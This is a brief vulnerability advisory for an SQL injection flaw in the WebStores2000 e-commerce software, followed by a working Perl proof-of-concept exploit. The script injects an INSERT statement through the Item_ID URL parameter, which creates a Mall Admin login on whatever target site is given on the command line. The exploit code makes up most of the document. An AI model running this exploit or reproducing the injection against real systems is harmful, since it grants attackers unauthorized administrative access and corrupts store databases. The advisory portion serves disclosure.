source: https://www.securityfocus.com/bid/7766/info This vulnerability is reportedly caused by a lack of sufficient sanitization of user-supplied data contained in URI parameters supplied to WebStores2000. Successful exploitation may allow for modification of the structure of SQL queries, resulting in information disclosure, or database corruption. #!/usr/bin/perl -w #This exploit create user with Mall Admin priv. #You can login via /MallAdmin/ $pamer = " 1ndonesian Security Team (1st) ============================== http://bosen.net/releases/ ws2k-ex.pl, WebStore2000 SQL Injection Proof of Concept Exploit by : Bosen Discover by : Bosen Greetz to : AresU, TioEuy, syzwz, TioEuy, sakitjiwa, muthafuka all #hackers\@centrin.net.id/austnet.org"; use LWP::UserAgent; use HTTP::Request; use HTTP::Response; $| = 1; print $pamer; if ($#ARGV<3){ print "\n Usage: perl ws2k-ex.pl \n\n"; exit; } my $legend = "$ARGV[0]/browse_item_details.asp?Item_ID="; $legend .= "''; insert into Mall_Logins values ('bosen','gembel')--"; my $bosen = LWP::UserAgent->new(); my $gembel = HTTP::Request->new(GET => $legend); my $dodol = $bosen->request($gembel); if ($dodol->is_error()) { printf " %s\n", $dodol->status_line; } else { print "Alhamdulillah :P\n"; } print "\n680165\n";